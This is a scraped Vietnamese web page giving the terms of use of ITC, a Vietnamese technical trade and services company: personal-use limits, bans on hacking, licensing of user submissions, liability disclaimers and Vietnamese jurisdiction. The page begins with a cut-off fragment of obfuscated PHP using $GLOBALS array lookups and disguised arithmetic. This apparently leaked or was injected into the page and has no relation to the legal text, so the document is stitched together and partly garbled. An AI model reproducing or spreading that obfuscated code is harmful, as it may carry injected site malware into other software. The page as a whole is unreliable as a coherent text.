=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) dieu-kien-su-dung | chinh-sach
Công cụ
Đăng nhập

Công ty cổ phần Thương mại và Dịch vụ Kỹ thuật ITC

Bạn đang ở: Home » Điều kiện sử dụng
Thứ bảy, 23 Tháng 5 2015

Điều kiện sử dụng

Email In PDF.

Các Điều kiện sử dụng trang web dưới đây có hiệu lực từ 18-02-2009 cho tới khi có thông báo thêm.

Sự chấp thuận đối với các điều kiện sử dụng trang web

Sự sử dụng trang web của ITC phụ thuộc vào các Điều kiện sử dụng trang web. Sử dụng trang web này được coi là sự chấp thuận của bạn đối với các Điều kiện sử dụng trang web và có hiệu lực kể từ lần đầu tiên bạn truy cập. Nếu bạn không chấp thuận các Điều kiện sử dụng trang web của ITC, bạn không được sử dụng trang web này. ITC có quyền cập nhật các Điều kiện sử dụng trang web mà không cần phải thông báo cho bạn. Các phiên bản mới nhất của các Điều kiện sử dụng trang web có thể xem bằng cách bấm vào liên kết "Điều kiện sử dụng" trên trang web www.itc.vn của chúng tôi. ITC có quyền thay đổi các Điều kiện sử dụng trang web bất kỳ lúc nào bằng cách đăng lên các thay đổi trực tuyến. Bạn có trách nhiệm tham khảo các Điều kiện sử dụng trang web khi truy cập trang web. Tiếp tục sử dụng trang web sau khi có những thay đổi đối với Điều kiện sử dụng trang web được coi là sự chấp thuận của bạn đối với các thay đổi được đăng lên đó.

Định nghĩa

ITC, chúng tôi, của chúng tôi tham chiếu tới công ty cổ phần thương mại và dịch vụ kỹ thuật ITC và các dịch vụ, nhãn hiệu do ITC cung cấp và sở hữu. Bạn, Khách hàng, Người dùng tham chiếu tới một cá nhân hay tổ chức, công ty đã đăng ký sử dụng dịch vụ của ITC và, khi có liên quan, cá nhân sử dụng trang web. Trang web, website, Trang web ITC tham chiếu tới http://www.itc.vn và các liên kết con của nó. Nguồn thông tin tham chiếu tới nhiều loại nguồn khác nhau bao gồm khu vực tải về, diễn dàn liên lạc và thông tin sản phẩm có trên trang web. Sản phẩm, Dịch vụ nghĩa là các đề nghị cung cấp của ITC, và có thể bao gồm Sản phẩm của bên thứ ba. Vấn đề có nghĩa là các lỗi/trục trặc/vấn đề kỹ thuật được ghi nhận đối với Máy tính Cá nhân và các thiết bị ngoại vi.

Điều khoản sử dụng cá nhân và phi thương mại

Trừ khi được qui định khác đi, Nguồn thông tin là để cho bạn dùng với mục đích sử dụng cá nhân và phi thương mại. Bạn không được thay đổi, sao chép, phân phối, truyền đi, hiển thị, thực hiện, tái tạo, xuất bản, cấp phép, tạo ra các dẫn xuất công việc, chuyển giao, hoặc bán bất kỳ thông tin, phần mềm, các sản phẩm và dịch vụ nhận được từ Nguồn thông tin.

Sự đảm bảo của khách hàng

BẠN KHÔNG ĐƯỢC CHO PHÉP BẤT KỲ NGƯỜI NÀO MÀ KHÔNG ĐƯỢC ỦY QUYỀN BỞI BẠN, HOẶC AI ĐÓ KHÔNG CHẤP THUẬN CÁC ĐIỀU KIỆN CỦA THỎA THUẬN NÀY TRUY CẬP VÀO TRANG WEB HOẶC GỬI YÊU CẦU TỪ MÁY TÍNH CỦA BẠN.

Quyền riêng tư và sự bảo vệ thông tin cá nhân

Xem chính sách về Quyền riêng tư nói rõ sự liên quan tới việc thu thập và sử dụng thông tin của bạn.

Không cho phép các hành vi sử dụng bị cấm hoặc phi pháp

Như là điều kiện của việc sử dụng của bạn đối với Nguồn thông tin và Dịch vụ, bạn sẽ không sử dụng chúng cho bất kỳ mục đích bị cấm hoặc phi pháp theo các điều kiện và thông báo này. Bạn không được sử dụng Nguồn thông tin và Dịch vụ theo bất kỳ cách nào có thể dẫn đến hư hại, mất khả năng hoạt động, quá tải, hoặc suy yếu bất kỳ máy chủ nào của ITC, hoặc (các) mạng kết nối đến bất kỳ máy chủ nào của ITC, hoặc gây cản trở tới bất kỳ việc sử dụng và thụ hưởng của bất kỳ Nguồn thông tin và/hoặc Dịch vụ của bất kỳ bên nào khác. Bạn không được tìm cách truy cập trái phép tới bất kỳ Nguồn thông tin và/hoặc Dịch vụ, các tài khoản khác, các hệ thống mạng và máy tính được nối tới bất kỳ máy chủ của ITC hoặc tới bất kỳ Nguồn thông tin và/hoặc Dịch vụ, thông qua bẻ khóa (hacking), dò trộm mật khẩu (password mining ) hoặc theo bất kỳ cách nào khác. Bạn không được thu nhận hay cố gắng thu nhận bất kỳ tài liệu hoặc thông tin thông qua bất kỳ cách nào mà không được chủ ý tạo ra để sử dụng thông qua Nguồn thông tin và Dịch vụ.

Tài liệu cung cấp cho ITC hoặc đăng trên bất kỳ Trang web ITC

Nếu bạn đóng góp cho trang web, thông qua một tính năng ví dụ như "Diễn đàn" hoặc bằng bất kỳ cách nào khác, mà tài liệu này, đôi lúc là sẵn dùng, bạn đồng ý rằng không đóng góp các tài liệu: (i) chứa bất kỳ nội dung tục tĩu, bôi nhọ, liên quan đến sách báo khiêu dâm, hoặc bị chỉ trích hoặc bất hợp pháp khác; (ii) vi phạm hoặc xâm phạm bất kỳ những gì do luật pháp qui định, luật phổ biến, quyền thiết kế có bản quyền, hoặc bất kỳ quyền sở hữu trí tuệ nào khác của bất kỳ người nào hoặc thực thể pháp lý nào; (iii) chứa tài liệu, ấn phẩm vi phạm bí mật hoặc không tuân lệnh tòa án; (iv) chứa virus hoặc sự lây nhiễm tương tự hoặc các tính năng phá hoại. ITC không yêu cầu sở hữu các tài liệu bạn cung cấp cho ITC (bao gồm cả các phản hồi và gợi ý) hoặc đăng bài, tải lên, nhập vào hoặc gửi tới bất kỳ Nguồn thông tin hoặc các Nguồn thông tin liên kết của nó để xem xét bởi công chúng, hoặc bởi các thành viên của bất kỳ cộng đồng riêng tư hoặc công cộng nào, (mỗi một "Bài gửi" và tập hợp các "Bài gửi"). Tuy nhiên, bởi việc đăng, tải lên, nhập vào, cung cấp hoặc gửi ("Đăng") Bài gửi của bạn thì bạn đang gán cho ITC, các công ty liên kết, và các người được cấp phép con cần thiết của mình, được sử dụng Bài gửi của bạn liên quan đến điều hành kinh doanh Internet của họ (bao gồm, nhưng không giới hạn, mọi Nguồn thông tin và Dịch vụ của ITC), bao gồm, nhưng không giới hạn, các quyền cấp phép như: phân phối, truyền đi, hiển thị công cộng, thực hiện công cộng, tái tạo, biên tập, dịch và tái định dạng Bài gửi của bạn; để xuất bản tên của bạn liên quan đến Bài gửi của bạn; và quyền cấp phép con các quyền như vậy cho bất kỳ người cung cấp Dịch vụ. Không có sự đền bù vật chất nào được trả đối với việc sử dụng Bài gửi của bạn, như được qui định tại đây. ITC không có nghĩa vụ đăng hoặc sử dụng bất kỳ Bài gửi nào của bạn và ITC có thể xóa bất kỳ Bài gửi vào bất kỳ lúc nào theo quyết định riêng của mình.

Bằng việc Đăng một Bài gửi bạn đảm bảo và tái khẳng định rằng bạn sở hữu hoặc kiểm soát mọi quyền khác đối với Bài gửi như đã được mô tả trong Điều khoản sử dụng trang web bao gồm, nhưng không giới hạn, mọi quyền cần thiết đối với bạn để cung cấp, đăng, tải lên, nhập hoặc gửi Bài viết.

Bổ sung thêm vào sự đảm bảo và tái khẳng định đã nói ở trên, bằng việc Đăng một Bài viết có chứa hình ảnh, ảnh chụp, tranh hoặc các hình đồ họa khác toàn bộ hay một phần ("Hình ảnh"), bạn đảm bảo và tái khẳng định rằng (a) bạn là chủ sở hữu bản quyền của Hình ảnh đó, hoặc chủ sở hữu bản quyền của Hình ảnh đó đã cho phép bạn sử dụng Hình ảnh đó hoặc bất kỳ nội dung và/hoặc các hình ảnh chứa trong Hình ảnh đó phù hợp với mục đích và cách sử dụng của bạn và theo cách khác được cho phép trong các Điều khoản sử dụng trang web và Dịch vụ này, (b) bạn có các quyền cần thiết để cấp các giấy phép và các giấy phép con mô tả trong các Điều khoản sử dụng trang web này, và (c) mỗi cá nhân được mô tả trong các Hình ảnh này, nếu có, đã cung cấp sự chấp thuận cho sử dụng Hình ảnh như đã được nêu trong các Điều khoản sử dụng trang web này, bao gồm, theo cách nêu ví dụ, nhưng không bị giới hạn bởi các ví dụ đó, hiển thị công cộng và tái sản xuất của những Hình ảnh đó.

Bởi việc Đăng Hình ảnh, bạn đồng ý cho (a) mọi thành viên của cộng đồng riêng tư của bạn (đối với mỗi Hình ảnh sẵn dùng cho các thành viên của cộng động riêng tư đó), và/hoặc, (b) công cộng (đối với mỗi Hình ảnh sẵn dùng bẩt kỳ đâu trên Dịch vụ, ngoài cộng đồng riêng tư), quyền được sử dụng Hình ảnh của bạn liên quan đến việc sử dụng, như đã được cho phép trong các Điều khoản sử dụng trang web này, hoặc bất kỳ Dịch vụ nào (bao gồm, theo cách nêu ví dụ, nhưng không bị giới hạn bởi các ví dụ đó, in ấn và tạo ra các món tặng phẩm bao gồm các Hình ảnh đó), và bao gồm, nhưng không bị giới hạn bởi, một giấy phép không phải trả tiền bản quyền, toàn cầu, không dành riêng để: sao chép, phân phối, hiển thị công cộng, thực hiện công cộng, tái sản xuất, biên tập, dịch và tái định dạng các Hình ảnh của bạn và không cần phải gắn kèm tên bạn với Hình ảnh đó, và quyền cấp giấy phép con các quyền như vậy cho bất kỳ người cung cấp nào của Dịch vụ. Các giấy phép được gán có trước các tuyên bố này đối với một Hình ảnh sẽ kết thúc vào lúc bạn xóa bỏ hoàn toàn Hình ảnh khỏi Dịch vụ, miễn là, sự kết thúc như vậy sẽ không ảnh hưởng đến bẩt kỳ giấy phép đã được cấp liên quan đến Hình ảnh đó trước lúc bạn xóa hoàn toàn Hình ảnh đó. Không có sự đền bù nào phải trả cho việc sử dụng Hình ảnh của bạn.

Các liên kết đến các trang web bên thứ ba

CÁC LIÊN KẾT TRONG KHU VỰC NÀY SẼ DẪN BẠN RỜI KHỎI TRANG WEB ITC. CÁC TRANG WEB LIÊN KẾT LÀ KHÔNG NẰM DƯỚI SỰ KIỂM SOÁT CỦA ITC VÀ ITC KHÔNG CHỊU TRÁCH NHIỆM CHO CÁC NỘI DUNG CỦA BẤT KỲ TRANG WEB LIÊN KẾT HOẶC BẤT KỲ LIÊN KẾT CHỨA TRONG MỘT TRANG WEB LIÊN KẾT, HOẶC BẤT KỲ CÁC THAY ĐỔI HOẶC CẬP NHẬT ĐỐI VỚI CÁC TRANG WEB NHƯ VẬY. ITC KHÔNG ĐẢM BẢO RẰNG BẤT KỲ HÀNG HÓA HOẶC DỊCH VỤ ĐƯỢC LIÊN KẾT TỚI HOẶC ĐƯỢC QUẢNG CÁO TRÊN TRANG WEB NÀY TUÂN THỦ VIỆC BẢO VỆ DỮ LIỆU HOẶC LUẬT LIÊN QUAN KHÁC VÀ ITC KHÔNG CHỊU TRÁCH NHIỆM TRONG BẤT KỲ TRƯỜNG HỢP NÀO CHO BẤT KỲ ĐÒI BỒI THƯỜNG PHÁT SINH TỪ NHỮNG HÀNG HÓA VÀ DỊCH VỤ NHƯ VẬY. ITC KHÔNG CHỊU TRÁCH NHIỆM ĐỐI VỚI VIỆC PHÁT TRÊN WEB HOẶC BẤT KỲ HÌNH THỨC TRUYỀN PHÁT NÀO KHÁC ĐƯỢC NHẬN TỪ BẤT KỲ TRANG WEB LIÊN KẾT NÀO. ITC CUNG CẤP CÁC LIÊN KẾT NÀY CHO BẠN CHỈ VỚI SỰ THUẬN TIỆN, VÀ VIỆC BAO GỒM BẤT KỲ LIÊN KẾT NÀO KHÔNG NGỤ Ý SỰ CHỨNG THỰC BỞI ITC ĐỐI VỚI TRANG WEB ĐÓ.

Bồi thường

Bạn đồng ý bồi thường, giữ cho và bảo vệ ITC được vô hại đối với bất kỳ và mọi mất mát, hư hỏng và chi phí (bao gồm cả chi phí pháp lý) mà ITC gặp phải do nguyên nhân của bất kỳ yêu cầu đòi bồi thường và các vụ kiện phát sinh ra ngoài hoặc liên quan đến sự sử dụng trang web này hoặc tài liệu đăng trên trang web này dùng các chi tiết đăng nhập của bạn, dù có được bạn ủy quyền hay không.

Sự từ bỏ quyền lợi

CÁC DỊCH VỤ ĐƯỢC THỰC HIỆN BỞI ITC KHÔNG CÓ BẤT KỲ SỰ ĐẢM BẢO HOẶC ĐẠI DIỆN, CHO DÙ NÓI RÕ HAY ÁM CHỈ, THUỘC BẤT KỲ HÌNH THỨC NÀO. KHÔNG GIỚI HẠN TÍNH TỔNG QUÁT CỦA CÂU TRƯỚC, ITC KHÔNG ĐẢM BẢO HOẶC TUYÊN BỐ RẰNG (A) DỊCH VỤ HOẶC TRANG WEB SẼ KHÔNG CÓ LỖI, (B) CÁC KHUYẾT ĐIỂM TRONG DỊCH VỤ HOĂC TRANG WEB SẼ ĐƯỢC SỬA CHỮA HOẶC (C) TRANG WEB KHÔNG NHIỄM VIRUS HOẶC MÃ MÁY TÍNH ĐỘC HẠI KHÁC.

Giới hạn trách nhiệm

ITC SẼ KHÔNG, DÙ VI PHẠM HỢP ĐỒNG, SAI LẦM CÁ NHÂN HOẶC CÁCH KHÁC HAY KHÔNG, CHỊU TRÁCH NHIỆM CHO BẤT KỲ THIỆT HẠI DO HẬU QUẢ, TRỰC TIẾP, NGẪU NHIÊN, GIÁN TIẾP, HÀNH VI TRỪNG PHẠT, ĐẶC BIỆT HOẶC CÁC THIỆT HẠI TƯƠNG TỰ KHÁC XẢY RA BỞI NGƯỜI DÙNG LIÊN QUAN ĐẾN DỊCH VỤ, TRANG WEB HOẶC BẤT KỲ VẤN ĐỀ KHÁC (BAO GỒM, NHƯNG KHÔNG BỊ GIỚI HẠN BỞI, BẤT KỲ VIỆC MẤT ĐI LỢI NHUẬN NÀO), NGAY CẢ KHI NẾU KHẢ NĂNG CỦA NHỮNG THIỆT HẠI NHƯ VẬY CÓ THỂ ĐÃ ĐƯỢC DỰ BÁO TRƯỚC BỞI ITC, HOẶC CHO BẤT KỲ THIỆT HẠI TRỰC TIẾP NÀO VƯỢT QUÁ MỨC PHÍ ĐÃ TRẢ CHO DỊCH VỤ BỞI NGƯỜI DÙNG TRONG NĂM MÀ NGƯỜI DÙNG PHẢI CHỊU THIỆT HẠI NHƯ VẬY HOẶC PHẦN TỶ LỆ GIÁ TRỊ ĐỐI VỚI THỜI GIAN CHƯA DÙNG ĐẾN DỊCH VỤ.

Thuế

Không có các khoản phí và/hoặc các khoản tiền thù lao thể hiện trên trang web bao gồm bất kỳ các loại thuế và các khoản phí do chính phủ quy định nào, trừ khi được nói rõ. Thuế sẽ do người dùng trả với mức qui định đang có hiệu lực tại thời điểm thanh toán và có thể thay đổi. Người dùng chịu trách nhiệm thanh toán mọi khoản thuế và các khoản phí do chính phủ quy định.

Trọng tài phân xử

Các Điều kiện sử dụng trang web này được chi phối và được giải thích tuân theo pháp luật Việt Nam và các bên đồng ý chịu sự áp dụng tuyệt đối của tòa án Việt Nam.

Nhãn hiệu thương mại

Mọi nhãn hiệu được tham khảo trên trang web là sở hữu của các chủ nhân tương ứng. Không có sự liên kết với bất kỳ công ty, tổ chức, sản phẩm, người nào, hoặc sự kiện có thực nào được phép dự định hoặc suy diễn tới.

Các tiêu đề

Các tiêu đề của từng phần sử dụng ở đây chỉ dành cho sự thuận tiện tham khảo và không hình thành nên một phần của các điều kiện này, và không có sự giải thích nào hoặc sự kết luận nào được bắt nguồn ở các tiêu đề này.